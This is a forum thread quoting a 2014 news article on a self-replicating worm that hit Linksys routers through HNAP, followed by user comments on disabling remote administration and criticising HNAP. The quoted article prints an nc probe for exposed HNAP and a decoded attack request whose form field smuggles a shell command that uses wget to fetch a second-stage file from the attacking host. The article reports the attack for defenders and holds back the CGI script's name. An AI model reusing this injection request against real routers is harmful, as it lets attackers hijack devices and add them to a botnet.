Main Area and Open Discussion > Living Room
WARNING! Linksys routers infected with self-replicating worm/malware.
IainB:
This could affect a lot of unsuspecting Linksys router users. (I used to use a Linksys WRT120N, which apparently could be a potential target for this worm.)
(ArsTchnica post copied below sans embedded hyperlinks/images.)
Bizarre attack infects Linksys routers with self-replicating malware
Some 1,000 devices have been hit by the worm, which seeks out others to infect.
by Dan Goodin - Feb 13, 2014 6:20 pm UTC
Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.
Johannes B. Ullrich, CTO of the Sans Institute, told Ars he has been able to confirm that the malicious worm has infected around 1,000 Linksys E1000, E1200, and E2400 routers, although the actual number of hijacked devices worldwide could be much higher. A blog post Sans published shortly after this article was posted expanded the range of vulnerable models to virtually the entire Linksys E product line. Once a device is compromised, it scans the Internet for other vulnerable devices to infect.
"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."
The worm works by injecting vulnerable devices with a URL-encoded shell script that carries out the same seek-and-hijack behavior. The exploit may also change some routers' domain name system server to 8.8.8.8 or 8.8.4.4, which are IP addresses used by Google's DNS service. Compromised routers remain infected until they are rebooted. Once the devices are restarted, they appear to return to their normal state. People who are wondering if their device is infected should check for heavy outbound scanning on port 80 and 8080, and inbound connection attempts to miscellaneous ports below 1024. To detect potentially vulnerable devices use the following command:
echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080
Devices that return the XML HNAP output may be vulnerable.
The attack begins with a remote call to the Home Network Administration Protocol (HNAP), an interface that allows ISPs and others to remotely manage home and office routers. The remote function is exposed by a built-in Web server that listens for commands sent over the Internet. Typically, it requires the remote user to enter a valid administrative password before executing commands, although previous bugs in HNAP implementations have left routers vulnerable to attack. After using HNAP to identify vulnerable routers, the worm exploits an authentication bypass vulnerability in a CGI script. (Ullrich isn't identifying the script because it remains unfixed on many older routers, and he doesn't want to make it easier for attackers to target it.) Ullrich said he has ruled out weak passwords as the cause of the Linksys infections.
So far, the only routers Ullrich has observed being compromised in the attack are the E1000, E1200, and E2400 models manufactured by Linksys. Routers running the latest 2.0.06 version of the firmware aren't being infected, leading him to believe that the vulnerability resides only in earlier versions. Unfortunately, no update is available for E1000 models, since they are no longer supported.
Infected devices are highly selective about the IP ranges they will scan when searching for other vulnerable routers. The sample Ullrich obtained listed just 627 blocks of /21 and /24 subnets. The net blocks appear to be targeting various consumer DSL and Cable ISPs worldwide, including Comcast, Cox, Roadrunner, RCN, and Charter in the US. The sample also scanned ranges owned by Bell (DSL) and Shaw (cable) in Canada, Virtua and Telesp in Brazil, RDSNET in Romania, Ziggo in the Netherlands, and Time.Net in Malaysia.
The discovery comes a week after researchers in Poland reported an ongoing attack used to steal online banking credentials, in part by modifying home routers' DNS settings. In turn, the phony domain name resolvers listed in the router settings redirected victims' computers, tablets, and smartphones to fraudulent websites masquerading as an authentic bank service; the sites would then steal the victims' login credentials. Ullrich said that the worm campaign he helped uncover this week appears to be unrelated, since there are no malicious DNS changes involved.
So why might the new attack, in select cases, redirect a router's DNS requests to Google? That remains unclear, though one theory suggests that the changes could allow attackers to bypass DNS policies enforced by specific ISPs.
Consuming bandwidth
The worm came to light earlier this week after the operator of a Wyoming ISP contacted Sans and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.
In a comment left in response to this article, ISP operator Brett Glass said the range of devices that are vulnerable is likely much wider than previously determined. He explained:
The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.
The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:
POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH
When decoded, the request is translated to:
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
`cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`
&StartEPI=1
Further Reading
Guerilla researcher created epic botnet to scan billions of IP addresses
With 9TB of data, survey is one of the most exhaustive—and illicit—ever done.
Ullrich takes this to mean that the worm downloads a second-stage exploit from port 193 of the attacking router. (The port can change, but it is always less than 1024.)
The objective behind this ongoing attack remains unclear. Given that the only observable behavior is to temporarily infect a highly select range of devices, one possible motivation is to test how viable a self-replicating worm can be in targeting routers. Indeed, last March, an anonymous hacker claimed to have built a botnet for more than 420,000 routers, modems, and other Internet-connected devices purely for the fun and knowledge it provided.
As was the case in that unconfirmed campaign, the behavior Ullrich has observed is rare, and it will be worth following Sans as it digs further into this attack. Ullrich has more details here and here.
Article updated throughout to add newly available information.
--- End quote ---
Stoic Joker:
Okay... I've only gotten as far as reading the above, but with an exploit that uses an HTTP request to port 8080 as an entry point I can only assume they're targeting the external access remote administration "feature" of the router. A feature that should be either turned off, or highly restricted to start with me thinks.
So is this exploit somehow bypassing configuration imposed restrictions, or is it just targeting the defaults crowd? I'm inclined to think simply turning off remote administration - like it's really used that often by home users - would sufficiently mitigate this but don't want to assume that just yet.
Edit: Looks like SANS confirmed the Remote Administration off = safe hypothesis.
40hz:
Sad part is it all comes down to HNAP. And the problems surrounding it go back at least three years. Good old Cisco. We get people to stop trusting UPnP and they throw in this piece of junk as a replacement. Nice of them to do something to reduce their consumer tech support calls by making things significantly less secure in order to do so.
Good article about that here. :-\
IainB:
^^ +1 for what 40hz said. :up:
Good link to the HNAP "Easy NOT EQUALS Secure" article.
So, why, one wonders, did UpNp get excommunicated and HNAP get invited in...? :tellme:
Some people (not me, you understand) might say that maybe the NSA couldn't hack into peoples' routers easily enough using UpNp , so they and Cisco invented HNAP to do it, but I couldn't possibly comment.
40hz:
^There are those who would say (but you know the sort of things THEY say) that the NSA is behind it all.
In this case, I think it really is Cisco just trying to make their life easy when it comes to products sold to a largely unsophisticated consumer demographic. Sort of like addressing a complaint that your password requirements are too stringent by switching to a 3-digit PIN scheme. If the NSA, or any of the other tri-letter pantheon benefited from any of this, I think it was purely serendipitous for them. Not that they'd complain.
HNAP made it in because Cisco implied that it was far more secure than it actually was to the people most likely to buy it. They were a little more forthright in their whitepaper. (But what average home user is ever going to read let alone understand that?) And you still needed to read between the lines to see their semi-acknowledgement it was dangerously dumbed down when it came to security.
So it goes... :-\
Navigation
[0] Message Index
[#] Next page
Go to full version